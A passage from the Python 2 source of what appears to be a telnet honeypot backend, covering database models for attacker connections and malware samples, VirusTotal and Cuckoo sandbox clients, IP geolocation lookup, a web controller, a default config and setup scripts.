print("Sample found in Sandbox, with ID: {}".format(res.json().get("sample", {}).get("id", 0)))
return True
else:
return False
except Exception as e:
print(e)
return False
def postfile(self, artifact, fileName):
"""
Send a file to Cuckoo
"""
files = {"file": (fileName, open(artifact, "rb").read())}
try:
res = requests.post(urljoin(self.url_base, "tasks/create/file").encode("utf-8"), files=files, auth=HTTPBasicAuth(
self.api_user,
self.api_passwd
),
verify=False)
if res and res.ok:
print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"]))
else:
print("Cuckoo Request failed: {}".format(res.status_code))
except Exception as e:
print("Cuckoo Request failed: {}".format(e))
return
def posturl(self, scanUrl):
"""
Send a URL to Cuckoo
"""
data = {"url": scanUrl}
try:
res = requests.post(urljoin(self.url_base, "tasks/create/url").encode("utf-8"), data=data, auth=HTTPBasicAuth(
self.api_user,
self.api_passwd
),
verify=False)
if res and res.ok:
print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"]))
else:
print("Cuckoo Request failed: {}".format(res.status_code))
except Exception as e:
print("Cuckoo Request failed: {}".format(e))
return
================================================
FILE: backend/db.py
================================================
import time
import json
import sqlalchemy
import random
from decorator import decorator
from sqlalchemy import Table, Column, BigInteger, Integer, Float, String, MetaData, ForeignKey, Text, Index
from sqlalchemy.sql import select, join, insert, text
from sqlalchemy.orm import relationship, sessionmaker, scoped_session
from sqlalchemy.pool import QueuePool
from sqlalchemy.ext.declarative import declarative_base
from util.config import config
is_sqlite = "sqlite://" in config.get("sql")
print("Creating/Connecting to DB")
@decorator
def db_wrapper(func, *args, **kwargs):
self = args[0]
if self.session:
return func(*args, **kwargs)
else:
self.db = get_db()
self.session = self.db.sess
try:
return func(*args, **kwargs)
self.session.commit()
self.session.flush()
finally:
self.db.end()
self.db = None
self.session = None
def now():
return int(time.time())
def filter_ascii(string):
if string == None:
string = ""
string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ")
return string
Base = declarative_base()
# n to m relation connection <-> url
conns_urls = Table('conns_urls', Base.metadata,
Column('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),
Column('id_url', None, ForeignKey('urls.id'), primary_key=True, index=True),
)
# n to m relation connection <-> tag
conns_tags = Table('conns_tags', Base.metadata,
Column('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),
Column('id_tag', None, ForeignKey('tags.id'), primary_key=True, index=True),
)
# n to m relationship connection <-> connection (associates)
conns_conns = Table('conns_assocs', Base.metadata,
Column('id_first', None, ForeignKey('conns.id'), primary_key=True, index=True),
Column('id_last', None, ForeignKey('conns.id'), primary_key=True, index=True),
)
class IPRange(Base):
__tablename__ = "ipranges"
ip_min = Column("ip_min", BigInteger, primary_key=True)
ip_max = Column("ip_max", BigInteger, primary_key=True)
cidr = Column("cidr", String(20), unique=True)
country = Column("country", String(3))
region = Column("region", String(128))
city = Column("city", String(128))
zipcode = Column("zipcode", String(30))
timezone = Column("timezone", String(8))
latitude = Column("latitude", Float)
longitude = Column("longitude", Float)
asn_id = Column('asn', None, ForeignKey('asn.asn'))
asn = relationship("ASN", back_populates="ipranges")
class User(Base):
__tablename__ = 'users'
id = Column('id', Integer, primary_key=True)
username = Column('username', String(32), unique=True, index=True)
password = Column('password', String(64))
connections = relationship("Connection", back_populates="backend_user")
def json(self, depth=0):
return {
"username": self.username
}
class Network(Base):
__tablename__ = 'network'
id = Column('id', Integer, primary_key=True)
samples = relationship("Sample", back_populates="network")
urls = relationship("Url", back_populates="network")
connections = relationship("Connection", back_populates="network")
nb_firstconns = Column('nb_firstconns', Integer, default=0)
malware_id = Column('malware', None, ForeignKey('malware.id'))
malware = relationship("Malware", back_populates="networks")
def json(self, depth=0):
return {
"id": self.id,
"samples": len(self.samples) if depth == 0 else map(lambda i: i.sha256, self.samples),
"urls": len(self.urls) if depth == 0 else map(lambda i: i.url, self.urls),
"connections": len(self.connections) if depth == 0 else map(lambda i: i.id, self.connections),
"firstconns": self.nb_firstconns,
"malware": self.malware.json(depth=0)
}
class Malware(Base):
__tablename__ = 'malware'
id = Column('id', Integer, primary_key=True)
name = Column('name', String(32))
networks = relationship("Network", back_populates="malware")
def json(self, depth=0):
return {
"id": self.id,
"name": self.name,
"networks": map(lambda i: i.id if depth == 0 else i.json(), self.networks)
}
class ASN(Base):
__tablename__ = 'asn'
asn = Column('asn', BigInteger, primary_key=True)
name = Column('name', String(64))
reg = Column('reg', String(32))
country = Column('country', String(3))
urls = relationship("Url", back_populates="asn")
connections = relationship("Connection", back_populates="asn")
ipranges = relationship("IPRange", back_populates="asn")
def json(self, depth=0):
return {
"asn": self.asn,
"name": self.name,
"reg": self.reg,
"country": self.country,
"urls": map(lambda url : url.url if depth == 0
else url.json(depth - 1), self.urls[:10]),
"connections": None if depth == 0 else map(lambda connection :
connection.json(depth - 1), self.connections[:10])
}
class Sample(Base):
__tablename__ = 'samples'
id = Column('id', Integer, primary_key=True)
sha256 = Column('sha256', String(64), unique=True, index=True)
date = Column('date', Integer)
name = Column('name', String(32))
file = Column('file', String(512))
length = Column('length', Integer)
result = Column('result', String(32))
info = Column('info', Text())
urls = relationship("Url", back_populates="sample")
network_id = Column('network', None, ForeignKey('network.id'), index=True)
network = relationship("Network", back_populates="samples")
def json(self, depth=0):
return {
"sha256": self.sha256,
"date": self.date,
"name": self.name,
"length": self.length,
"result": self.result,
"info": self.info,
"urls": len(self.urls) if depth == 0 else map(lambda url :
url.json(depth - 1), self.urls),
"network": self.network_id if depth == 0 else self.network.json()
}
class Connection(Base):
__tablename__ = 'conns'
id = Column('id', Integer, primary_key=True)
ip = Column('ip', String(16))
date = Column('date', Integer, index=True)
user = Column('user', String(16))
password = Column('pass', String(16))
connhash = Column('connhash', String(256), index=True)
stream = Column('text_combined', Text())
asn_id = Column('asn', None, ForeignKey('asn.asn'), index=True)
asn = relationship("ASN", back_populates="connections")
backend_user_id = Column('backend_user_id', None, ForeignKey('users.id'), index=True)
backend_user = relationship("User", back_populates="connections")
ipblock = Column('ipblock', String(32))
country = Column('country', String(3))
city = Column('city', String(32))
lon = Column('lon', Float)
lat = Column('lat', Float)
urls = relationship("Url", secondary=conns_urls, back_populates="connections")
tags = relationship("Tag", secondary=conns_tags, back_populates="connections")
network_id = Column('network', None, ForeignKey('network.id'), index=True)
network = relationship("Network", back_populates="connections")
conns_before = relationship("Connection", secondary=conns_conns,
back_populates="conns_after",
primaryjoin=(conns_conns.c.id_last==id),
secondaryjoin=(conns_conns.c.id_first==id))
conns_after = relationship("Connection", secondary=conns_conns,
back_populates="conns_before",
primaryjoin=(conns_conns.c.id_first==id),
secondaryjoin=(conns_conns.c.id_last==id))
def json(self, depth=0):
stream = None
if depth > 0:
try:
stream = json.loads(self.stream)
except:
try:
# Fix Truncated JSON ...
s = self.stream[:self.stream.rfind("}")] + "}]"
stream = json.loads(s)
except:
stream = []
return {
"id": self.id,
"ip": self.ip,
"date": self.date,
"user": self.user,
"password": self.password,
"connhash": self.connhash,
"stream": stream,
"network": self.network_id if depth == 0 else (self.network.json() if self.network != None else None),
"asn": None if self.asn == None else self.asn.json(0),
"ipblock": self.ipblock,
"country": self.country,
"city": self.city,
"longitude": self.lon,
"latitude": self.lat,
"conns_before": map(lambda conn : conn.id if depth == 0
else conn.json(depth - 1), self.conns_before),
"conns_after": map(lambda conn : conn.id if depth == 0
else conn.json(depth - 1), self.conns_after),
"backend_user": self.backend_user.username,
"urls": len(self.urls) if depth == 0 else map(lambda url :
url.json(depth - 1), self.urls),
"tags": len(self.tags) if depth == 0 else map(lambda tag :
tag.json(depth - 1), self.tags),
}
Index('idx_conn_user_pwd', Connection.user, Connection.password)
class Url(Base):
__tablename__ = 'urls'
id = Column('id', Integer, primary_key=True)
url = Column('url', String(256), unique=True, index=True)
date = Column('date', Integer)
sample_id = Column('sample', None, ForeignKey('samples.id'), index=True)
sample = relationship("Sample", back_populates="urls")
network_id = Column('network', None, ForeignKey('network.id'), index=True)
network = relationship("Network", back_populates="urls")
connections = relationship("Connection", secondary=conns_urls, back_populates="urls")
asn_id = Column('asn', None, ForeignKey('asn.asn'))
asn = relationship("ASN", back_populates="urls")
ip = Column('ip', String(32))
country = Column('country', String(3))
def json(self, depth=0):
return {
"url": self.url,
"date": self.date,
"sample": None if self.sample == None else
(self.sample.sha256 if depth == 0
else self.sample.json(depth - 1)),
"connections": len(self.connections) if depth == 0 else map(lambda connection :
connection.json(depth - 1), self.connections),
"asn": None if self.asn == None else
(self.asn.asn if depth == 0
else self.asn.json(depth - 1)),
"ip": self.ip,
"country": self.country,
"network": self.network_id if depth == 0 else self.network.json()
}
class Tag(Base):
__tablename__ = 'tags'
id = Column('id', Integer, primary_key=True)
name = Column('name', String(32), unique=True)
code = Column('code', String(256))
connections = relationship("Connection", secondary=conns_tags, back_populates="tags")
def json(self, depth=0):
return {
"name": self.name,
"code": self.code,
"connections": None if depth == 0 else map(lambda connection :
connection.json(depth - 1), self.connections)
}
samples = Sample.__table__
conns = Connection.__table__
urls = Url.__table__
tags = Tag.__table__
eng = None
if is_sqlite:
eng = sqlalchemy.create_engine(config.get("sql"),
poolclass=QueuePool,
pool_size=1,
max_overflow=20,
connect_args={'check_same_thread': False})
else:
eng = sqlalchemy.create_engine(config.get("sql"),
poolclass=QueuePool,
pool_size=config.get("max_db_conn"),
max_overflow=config.get("max_db_conn"))
Base.metadata.create_all(eng)
def get_db():
return DB(scoped_session(sessionmaker(bind=eng)))
def delete_everything():
spare_tables = ["users", "asn", "ipranges"]
eng.execute("SET FOREIGN_KEY_CHECKS=0;")
for table in Base.metadata.tables.keys():
if table in spare_tables:
continue
sql_text = "DELETE FROM " + table + ";"
print sql_text
eng.execute(sql_text)
eng.execute("SET FOREIGN_KEY_CHECKS=1;")
class DB:
def __init__(self, sess):
self.sample_dir = config.get("sample_dir")
self.limit_samples = 32
self.limit_urls = 32
self.limit_conns = 32
self.sess = sess
def end(self):
try:
self.sess.commit()
finally:
self.sess.remove()
# INPUT
def put_sample_data(self, sha256, data):
file = self.sample_dir + "/" + sha256
fp = open(file, "wb")
fp.write(data)
fp.close()
self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(file=file))
def put_sample_result(self, sha256, result):
self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(result=result))
def put_url(self, url, date, url_ip, url_asn, url_country):
ex_url = self.sess.execute(urls.select().where(urls.c.url == url)).fetchone()
if ex_url:
return ex_url["id"]
else:
return self.sess.execute(urls.insert().values(url=url, date=date, sample=None, ip=url_ip, asn=url_asn, country=url_country)).inserted_primary_key[0]
def put_conn(self, ip, user, password, date, text_combined, asn, block, country, connhash):
return self.sess.execute(conns.insert().values((None, ip, date, user, password, text_combined, asn, block, country))).inserted_primary_key[0]
def put_sample(self, sha256, name, length, date, info, result):
ex_sample = self.get_sample(sha256).fetchone()
if ex_sample:
return ex_sample["id"]
else:
return self.sess.execute(samples.insert().values(sha256=sha256, date=date, name=name, length=length, result=result, info=info)).inserted_primary_key[0]
def link_conn_url(self, id_conn, id_url):
self.sess.execute(conns_urls.insert().values(id_conn=id_conn, id_url=id_url))
def link_url_sample(self, id_url, id_sample):
self.sess.execute(urls.update().where(urls.c.id == id_url).values(sample=id_sample))
def link_conn_tag(self, id_conn, id_tag):
self.sess.execute(conns_tags.insert().values(id_conn=id_conn, id_tag=id_tag))
# OUTPUT
def get_conn_count(self):
q = """
SELECT COUNT(id) as count FROM conns
"""
return self.sess.execute(text(q)).fetchone()["count"]
def get_sample_count(self):
q = """
SELECT COUNT(id) as count FROM samples
"""
return self.sess.execute(text(q)).fetchone()["count"]
def get_url_count(self):
q = """
SELECT COUNT(id) as count FROM urls
"""
return self.sess.execute(text(q)).fetchone()["count"]
def search_sample(self, q):
q = "%" + q + "%"
return self.sess.execute(samples.select().where(samples.c.name.like(q) | samples.c.result.like(q)).limit(self.limit_samples))
def search_url(self, q):
search = "%" + q + "%"
q = """
SELECT urls.url as url, urls.date as date, samples.sha256 as sample
FROM urls
LEFT JOIN samples on samples.id = urls.sample
WHERE urls.url LIKE :search
LIMIT :limit
"""
return self.sess.execute(text(q), {"search": search, "limit": self.limit_urls})
def get_url(self, url):
q = """
SELECT urls.url as url, urls.date as date, samples.sha256 as sample, urls.id as id
FROM urls
LEFT JOIN samples on samples.id = urls.sample
WHERE urls.url = :search
"""
return self.sess.execute(text(q), {"search": url})
def get_url_conns(self, id_url):
q = """
SELECT conns.ip as ip, conns.user as user, conns.pass as password, conns.date as date
FROM conns_urls
LEFT JOIN conns on conns.id = conns_urls.id_conn
WHERE conns_urls.id_url = :id_url
ORDER BY conns.date DESC
LIMIT :limit
"""
return self.sess.execute(text(q), {"id_url": id_url, "limit" : self.limit_samples})
def get_url_conns_count(self, id_url):
q = """
SELECT COUNT(conns_urls.id_conn) as count
FROM conns_urls
WHERE conns_urls.id_url = :id_url
"""
return self.sess.execute(text(q), {"id_url": id_url})
def get_sample_stats(self, date_from = 0):
date_from = 0
limit = self.limit_samples
q = """
select
samples.name as name, samples.sha256 as sha256,
COUNT(samples.id) as count, MAX(conns.date) as lastseen,
samples.length as length, samples.result as result
from conns_urls
INNER JOIN conns on conns_urls.id_conn = conns.id
INNER JOIN urls on conns_urls.id_url = urls.id
INNER JOIN samples on urls.sample = samples.id
WHERE conns.date > :from
GROUP BY samples.id
ORDER BY count DESC
LIMIT :limit"""
return self.sess.execute(text(q), {"from": date_from, "limit": self.limit_samples})
def history_global(self, fromdate, todate, delta=3600):
q = """
SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour
FROM conns
WHERE conns.date >= :from
AND conns.date <= :to
GROUP BY hour
"""
return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta})
def history_sample(self, id_sample, fromdate, todate, delta=3600):
q = """
SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour
FROM conns
INNER JOIN conns_urls on conns_urls.id_conn = conns.id
INNER JOIN urls on conns_urls.id_url = urls.id
WHERE urls.sample = :id_sample
AND conns.date >= :from
AND conns.date <= :to
GROUP BY hour
ORDER BY hour ASC
"""
return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta, "id_sample" : id_sample})
def get_samples(self):
return self.sess.execute(samples.select().limit(self.limit_samples))
def get_sample(self, sha256):
return self.sess.execute(samples.select().where(samples.c.sha256 == sha256))
print("DB Setup done")
================================================
FILE: backend/ipdb/.gitignore
================================================
*.CSV
*.csv
================================================
FILE: backend/ipdb/__init__.py
================================================
================================================
FILE: backend/ipdb/ipdb.py
================================================
import csv
import ipaddress
import struct
import os
def ipstr2int(ip):
ip = unicode(ip)
ip = ipaddress.IPv4Address(ip).packed
ip = struct.unpack("!I", ip)[0]
return ip
class Entry:
def __init__(self, start, end, value):
self.start = int(start)
self.end = int(end)
self.value = value
class IPTable:
def __init__(self, fname):
self.tzlist = []
iplocfile = os.path.join(os.path.dirname(__file__), fname)
with open(iplocfile, "rb") as ipcsv:
reader = csv.reader(ipcsv, delimiter=',', quotechar='"')
for row in reader:
e = Entry(row[0], row[1], row)
self.tzlist.append(e)
def find_i(self, ip, start, end):
if end - start < 100:
for i in range(start, end):
obj = self.tzlist[i]
if obj.start <= ip and ip <= obj.end:
return obj.value
return None
else:
mid = start + (end - start) / 2
val = self.tzlist[mid].start
if ip < val: return self.find_i(ip, start, mid)
elif ip > val: return self.find_i(ip, mid, end)
else: return self.tzlist[mid].value
def __iter__(self):
return self.tzlist.__iter__()
def find_int(self, ip):
return self.find_i(ip, 0, len(self.tzlist) - 1)
def find(self, ip):
return self.find_i(ipstr2int(ip), 0, len(self.tzlist) - 1)
def get_geo():
return IPTable("IP2LOCATION-LITE-DB11.CSV")
def get_asn():
return IPTable("IP2LOCATION-LITE-ASN.CSV")
def get_geo_iter():
iplocfile = os.path.join(os.path.dirname(__file__), "IP2LOCATION-LITE-DB11.CSV")
fp = open(iplocfile, "rb")
return csv.reader(fp, delimiter=',', quotechar='"')
class IPDB:
def __init__(self):
self.geo = get_geo()
self.asn = get_asn()
def find(self, ip):
geo = self.geo.find(ip)
asn = self.asn.find(ip)
if geo != None and asn != None:
r = {}
r["asn"] = int(asn[3])
r["ipblock"] = asn[2]
r["country"] = geo[2]
r["region"] = geo[4]
r["city"] = geo[5]
r["zip"] = geo[8]
r["lon"] = float(geo[7])
r["lat"] = float(geo[6])
r["timezone"] = geo[9]
return r
else:
return None
if __name__ == "__main__":
db = IPDB()
print db.find("217.81.94.77")
================================================
FILE: backend/virustotal.py
================================================
import requests
import time
import db
import Queue
from util.config import config
class QuotaExceededError(Exception):
def __str__(self):
return "QuotaExceededError: Virustotal API Quota Exceeded"
class Virustotal:
def __init__(self, key):
self.api_key = key
self.url = "https://www.virustotal.com/vtapi/v2/"
self.user_agent = "Telnet Honeybot Backend"
self.engines = ["DrWeb", "Kaspersky", "ESET-NOD32"]
self.queue = Queue.Queue()
self.timeout = 0
def req(self, method, url, files=None, params=None, headers=None):
print "VT " + url
r = None
if method == "GET":
r = requests.get(url, files=files, params=params, headers=headers)
elif method == "POST":
r = requests.post(url, files=files, params=params, headers=headers)
else:
raise ValueError("Unknown Method: " + str(method))
if r.status_code == 204:
raise QuotaExceededError()
else:
return r
def upload_file(self, f, fname):
fp = open(f, 'rb')
params = {'apikey': self.api_key}
files = {'file': (fname, fp)}
headers = { "User-Agent" : self.user_agent }
res = self.req("POST", self.url + 'file/scan', files=files, params=params, headers=headers)
json = res.json()
fp.close()
if json["response_code"] == 1:
return json
else:
return None
def query_hash_sha256(self, h):
params = { 'apikey': self.api_key, 'resource': h }
headers = { "User-Agent" : self.user_agent }
res = self.req("GET", self.url + "file/report", params=params, headers=headers)
json = res.json()
if json["response_code"] == 1:
return json
else:
return None
def put_comment(self, obj, msg):
res = None
params = { 'apikey': self.api_key, 'resource': obj, "comment": msg }
headers = { "User-Agent" : self.user_agent }
res = self.req("GET", self.url + "comments/put", params=params, headers=headers)
json = res.json()
if json["response_code"] == 1:
return json
else:
return None
def get_best_result(self, r):
if r["scans"]:
for e in self.engines:
if r["scans"][e] and r["scans"][e]["detected"]:
return r["scans"][e]["result"]
for e,x in r["scans"].iteritems():
if x["detected"]:
return x["result"]
return None
else:
return None
================================================
FILE: backend/virustotal_fill_db.py
================================================
import os
from util.dbg import dbg
from virustotal import Virustotal
from sampledb import Sampledb
vt = Virustotal()
sdb = Sampledb()
# Engines on vt providing good results
engines = ["DrWeb", "Kaspersky", "ESET-NOD32"]
def getName(r):
if r["scans"]:
for e in engines:
if r["scans"][e] and r["scans"][e]["detected"]:
return r["scans"][e]["result"]
for e,x in r["scans"].iteritems():
if x["detected"]:
return x["result"]
return None
else:
return None
#sdb.sql.execute('ALTER TABLE samples ADD COLUMN result TEXT')
#sdb.sql.commit()
for row in sdb.sql.execute('SELECT id, sha256 FROM samples WHERE result is NULL'):
r = vt.query_hash_sha256(row[1])
res = str(getName(r))
print(row[1] + ": " + res)
sdb.sql.execute('UPDATE samples SET result = ? WHERE id = ?', (res, row[0]))
sdb.sql.commit()
================================================
FILE: backend/webcontroller.py
================================================
import os
import hashlib
import traceback
import struct
import json
import time
import math
import additionalinfo
import ipdb.ipdb
from sqlalchemy import desc, func, and_, or_, not_
from functools import wraps
from simpleeval import simple_eval
from argon2 import argon2_hash
from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper, conns_conns
from virustotal import Virustotal
from cuckoo import Cuckoo
from util.dbg import dbg
from util.config import config
from difflib import ndiff
class WebController:
def __init__(self):
self.session = None
@db_wrapper
def get_connection(self, id):
connection = self.session.query(Connection).filter(Connection.id == id).first()
if connection:
return connection.json(depth=1)
else:
return None
@db_wrapper
def get_connections(self, filter_obj={}, older_than=None):
query = self.session.query(Connection).filter_by(**filter_obj)
if older_than:
query = query.filter(Connection.date < older_than)
query = query.order_by(desc(Connection.date))
connections = query.limit(32).all()
return map(lambda connection : connection.json(), connections)
@db_wrapper
def get_connections_fast(self):
conns = self.session.query(Connection).all()
clist = []
for conn in conns:
clist.append({
"id": conn.id,
"ip": conn.ip,
"conns_before": map(lambda c: c.id, conn.conns_before),
"conns_after": map(lambda c: c.id, conn.conns_after)
})
return clist
##
@db_wrapper
def get_networks(self):
networks = self.session.query(Network).all()
ret = []
for network in networks:
if len(network.samples) > 0 and network.nb_firstconns >= 10:
n = network.json(depth = 0)
# ips = set()
# for connection in network.connections:
# ips.add(connection.ip)
# n["ips"] = list(ips)
ret.append(n)
return ret
@db_wrapper
def get_network(self, net_id):
network = self.session.query(Network).filter(Network.id == net_id).first()
ret = network.json()
honeypots = {}
initialconnections = filter(lambda connection: len(connection.conns_before) == 0, network.connections)
ret["connectiontimes"] = map(lambda connection: connection.date, initialconnections)
has_infected = set([])
for connection in network.connections:
if connection.backend_user.username in honeypots:
honeypots[connection.backend_user.username] += 1
else:
honeypots[connection.backend_user.username] = 1
for connection_before in connection.conns_before:
if connection.ip != connection_before.ip:
has_infected.add(("i:" + connection.ip, "i:" + connection_before.ip))
for url in connection.urls:
has_infected.add(("u:" + url.url, "i:" + connection.ip))
if url.sample:
has_infected.add(("s:" + url.sample.sha256, "u:" + url.url))
ret["has_infected"] = list(has_infected)
ret["honeypots"] = honeypots
return ret
@db_wrapper
def get_network_history(self, not_before, not_after, network_id):
granularity = float(3600 * 24) # 1 day
timespan = float(not_after - not_before)
if timespan < 3600 * 24 * 2:
granularity = float(3600) * 2
conns = self.session.query(Connection.date)
conns = conns.filter(Connection.network_id == network_id)
conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))
# Filter out subsequent connections
conns = conns.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)
conns = conns.filter(conns_conns.c.id_last == None)
ret = [0] * int(math.ceil(timespan / granularity))
for i in range(len(ret)):
ret[i] = [ not_before + i * granularity, 0 ]
for date in conns.all():
i = int((date[0] - not_before) / granularity)
ret[i][1] += 1
return ret
@db_wrapper
def get_biggest_networks_history(self, not_before, not_after):
MAX_NETWORKS = 4
n = self.session.query(Connection.network_id, func.count(Connection.network_id))
n = n.filter(and_(not_before < Connection.date, Connection.date < not_after))
# Filter out subsequent connections
n = n.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)
n = n.filter(conns_conns.c.id_last == None)
n = n.group_by(Connection.network_id)
n = n.order_by(func.count(Connection.network_id).desc())
data = n.all()
nb_networks = min(MAX_NETWORKS, len(data))
r = [0] * nb_networks
i = 0
for net in data[:nb_networks]:
network = self.session.query(Network).filter(Network.id == net[0]).first()
if (network != None):
r[i] = { "network": network.json(), "data": self.get_network_history(not_before, not_after, network.id) }
i += 1
return r
@db_wrapper
def get_connection_locations(self, not_before, not_after, network_id = None):
conns = self.session.query(Connection.lat, Connection.lon)
conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))
if network_id:
conns = conns.filter(Connection.network_id == network_id)
conns = conns.all()
return conns
##
@db_wrapper
def get_malwares(self):
malwares = self.session.query(Malware).all()
return map(lambda m: m.json(), malwares)
##
@db_wrapper
def get_sample(self, sha256):
sample = self.session.query(Sample).filter(Sample.sha256 == sha256).first()
return sample.json(depth=1) if sample else None
@db_wrapper
def get_newest_samples(self):
samples = self.session.query(Sample).order_by(desc(Sample.date)).limit(16).all()
return map(lambda sample : sample.json(), samples)
##
@db_wrapper
def get_url(self, url):
url_obj = self.session.query(Url).filter(Url.url == url).first()
return url_obj.json(depth=1) if url_obj else None
@db_wrapper
def get_newest_urls(self):
urls = self.session.query(Url).order_by(desc(Url.date)).limit(16).all()
return map(lambda url : url.json(), urls)
##
@db_wrapper
def get_tag(self, name):
tag = self.session.query(Tag).filter(Tag.name == name).first()
return tag.json(depth=1) if tag else None
@db_wrapper
def get_tags(self):
tags = self.session.query(Tag).all()
return map(lambda tag : tag.json(), tags)
##
@db_wrapper
def get_country_stats(self):
stats = self.session.query(func.count(Connection.country), Connection.country).group_by(Connection.country).all()
return stats
##
@db_wrapper
def get_asn(self, asn):
asn_obj = self.session.query(ASN).filter(ASN.asn == asn).first()
if asn_obj:
return asn_obj.json(depth=1)
else:
return None
##
@db_wrapper
def connhash_tree_lines(self, lines, mincount):
length = 1 + lines * 4
othercount = 0
ret = {}
dbres = self.session.query(func.count(Connection.id),
func.substr(Connection.connhash, 0, length).label("c"),
Connection.stream, Connection.id).group_by("c").all()
for c in dbres:
count = c[0]
connhash = c[1]
if count > mincount:
ev_in = filter(lambda ev : ev["in"], json.loads(c[2]))
if len(ev_in) >= lines:
ret[connhash] = {
"count": c[0],
"connhash": connhash,
"text": ev_in[lines-1]["data"],
"childs": [],
"sample_id": c[3]
}
else:
othercount += count
return ret
@db_wrapper
def connhash_tree(self, layers):
tree = self.connhash_tree_lines(1, 10)
layer = tree
for lines in range(2,layers+1):
length = (lines-1) * 4
new_layer = self.connhash_tree_lines(lines, 0)
for connhash in new_layer:
connhash_old = connhash[:length]
if connhash_old in layer:
parent = layer[connhash_old]
parent["childs"].append(new_layer[connhash])
layer = new_layer
return tree
================================================
FILE: backend.py
================================================
import sys
import json
import traceback
from util.config import config
if len(sys.argv) > 1 and sys.argv[1] == "cleardb":
print "This will DELETE ALL DATA except users and cached asn data"
print "from the database currently used at:"
print ""
print " " + config.get("sql")
print ""
print "If you really want to DELETE ALL DATA, type 'delete' and press enter."
print ""
doit = sys.stdin.readline()
print ""
if doit.strip() != "delete":
print "ABORTED"
sys.exit(0)
from backend.db import delete_everything
delete_everything()
sys.exit(0)
# Import from backend is faster:
# Benchmark:
# CPU: Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz
# Storage: Samsung SSD PM961
# File size: 7,3M
# SQLite:
# honeypot: 0m26,056s
# backend: 0m21,445s
# Mariadb:
# honeypot: 0m32,684s
# backend: 0m14,849s
if len(sys.argv) > 2 and sys.argv[1] == "import":
from backend.clientcontroller import ClientController
fname = sys.argv[2]
if len(sys.argv) > 3:
username = sys.argv[3]
else:
username = config.get("backend_user")
print "Importing " + fname + " as user " + username
with open(fname, "rb") as fp:
ctrl = ClientController()
for line in fp:
line = line.strip()
obj = json.loads(line)
if obj["ip"] != None and obj["date"] >= 1515899912:
print "conn " + obj["ip"] + " date " + str(obj["date"])
obj["backend_username"] = username
try:
ctrl.put_session(obj)
except:
print "Cannot Put Session"
print "----------------------------"
traceback.print_exc()
print "----------------------------"
print repr(obj)
sys.exit(0)
sys.exit(0)
if len(sys.argv) > 1:
print "Unknown action '" + sys.argv[1] + "'"
print "Available commands:"
print " import file.json : imports raw og file"
print " cleardb : deletes all data from db"
print "To simply start the backend, use no command at all"
sys.exit(0)
from backend.backend import run
run()
================================================
FILE: config.dist.yaml
================================================
# This is the default (distribution) config file
# For local configuration, please create and edit the file "config.yaml",
# this ensures your configuration to endure a update using git pull
# this file is in YAML format
# If you don't know YAML, check https://de.wikipedia.org/wiki/YAML
# or just copy around existing entries
#############################################
# Global config
# used by both honeypot AND backend
# Credentials for authetification
# Used by honeypot only
# If not set, will be randomly generated
# If the backend cannot find a user with id == 1 in its database,
# it will generate one using this credentials (or the ones autogenerated)
# backend_user: "CHANGEME"
# backend_pass: "CHANGEME"
##############################################
# Honeypot configuration
# Backend URL to which honeypot will connect to to store data
backend: "http://localhost:5000"
# Write raw data to logfile, can be imported into backend db later
# does include everything EXCEPT sample contents
log_raw: null
# Save samples in sample_dir
log_samples: False
# Do not download any samples, use their url as content
# useful for debugging
fake_dl: false
# Telnet port
telnet_addr: ""
telnet_port: 2323
# Timeout in seconds for telnet session. Will expire if no bytes can be read from socket.
telnet_session_timeout: 60
# Maximum session length in seconds.
telnet_max_session_length: 120
# Minimum time between 2 connection from the same ip, if closer together
# they will be refused
telnet_ip_min_time_between_connections: 30
#############################################
# Backend configuration
# sqlalchemy sql connect string
# examples:
# using sqlite: "sqlite:///database.db"
# using mysql: ""mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME","
sql: "sqlite:///database.db"
# IP Address and port for http interface
http_port: 5000
http_addr: "127.0.0.1"
# Max connections to sql db, maybe restricted in some scenarios
max_db_conn: 1
# Directory in which samples are stored
sample_dir: "samples"
# Virustotal API key
vt_key: "GET_YOUR_OWN"
submit_to_vt: false
# Enable or Disable IP to ASN resolution
# Options: "none" | "offline" | "online"
# offline works by importing data from https://lite.ip2location.com/ - dowload must be done manually
# online works by querying origin.asn.cymru.com
ip_to_asn_resolution: "online"
cuckoo_enabled: false,
cuckoo_url_base: "http://127.0.0.1:8090"
cuckoo_user: "user"
cuckoo_passwd: "passwd"
cuckoo_force: 0
================================================
FILE: create_config.sh
================================================
#!/bin/bash
if [ -f config.yaml ]; then
echo "config.yaml already exists, aborting"
exit
fi
user=admin
pass=$(openssl rand -hex 16)
salt=$(openssl rand -hex 16)
echo "backend_user: $user" >> config.yaml
echo "backend_pass: $pass" >> config.yaml
echo "backend_salt: $salt" >> config.yaml
================================================
FILE: create_docker.sh
================================================
#!/bin/bash
if [ -f config.yaml ]; then
echo -n "config.yaml already exists, delete it? (Y/n): "
read force
if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then
rm config.yaml
else
echo aborting...
exit 1
fi
fi
if [ -f docker-compose.yml ]; then
echo -n "docker-compose.yml already exists, delete it? (Y/n): "
read force
if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then
rm docker-compose.yml
else
echo aborting...
exit 1
fi
fi
echo -n "DB: Use maria or sqlite? (maria/sqlite): "
read dbbackend
if [ "$dbbackend" != "maria" ] && [ "$dbbackend" != "sqlite" ]; then
echo "$dbbackend is not valid"
exit 1
fi
# Honeypot setup
echo " - Writing honeypot config"
user=admin
pass=$(openssl rand -hex 16)
